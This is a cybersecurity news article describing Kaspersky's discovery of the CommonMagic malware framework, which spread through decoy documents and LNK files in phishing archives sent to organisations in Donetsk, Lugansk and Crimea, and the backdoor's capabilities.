Share this article on:
Security researchers have found active malware infections in a number of organisations in the Donetsk, Lugansk, and Crimea regions of Ukraine.
The malware appears to have been introduced to the infected networks via a phishing campaign, though Kaspersky’s experts have yet to ascertain the exact attack vector. The affected organisations are in the government, agriculture, and transportation sectors.
The payload is installed by tricking victims into accessing what appears to be official documents, such as one labelled “Results of the State Duma elections in the Republic of Crimea” and another “Ministry of Finance Decree No. 176”. The documents are all written in Cyrillic and contain emails addressed with a .ru domain.
The documents are a decoy, however. They’re in a zipped archive alongside a .lnk file — in some cases sharing the same name as the decoy document — which begins the infection chain.
When clicked on, the .lnk file downloads an MSI file, which in turn creates a number of folders and documents and sets up a Task Scheduler job.
“When the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that lead to the infection of the computer with a previously unseen malicious framework that we named CommonMagic,” Kaspersky’s researchers said in a blog post.
“The malware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code has no direct relation to any known campaigns.”
Once fully installed, the CommonMagic framework installs a backdoor into the system, which is capable of taking screenshots every three seconds and reading a number of file types from USB devices. New executables are downloaded from a OneDrive directory; this is also where encrypted data is uploaded to whatever threat actor is behind the malware.
Beyond that, though, not much else is yet known about the campaign.
“So far, we have found no direct links between the samples and data used in this campaign and any previously known actors,” Kaspersky said. “However, the campaign is still active, and our investigation continues. So, we believe that further discoveries may reveal additional information about this malware and the threat actor behind it.”
All that being said, it is hard not to attribute this campaign to Ukrainian operators, given the targets are in Russian-annexed regions of the country and appear to be Russian speakers with an interest in official Russian documentation.
Cyber activity between the two countries has risen dramatically since the annexation of Crimea in 2014, and in particular, since Russia’s illegal invasion of the country last year.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.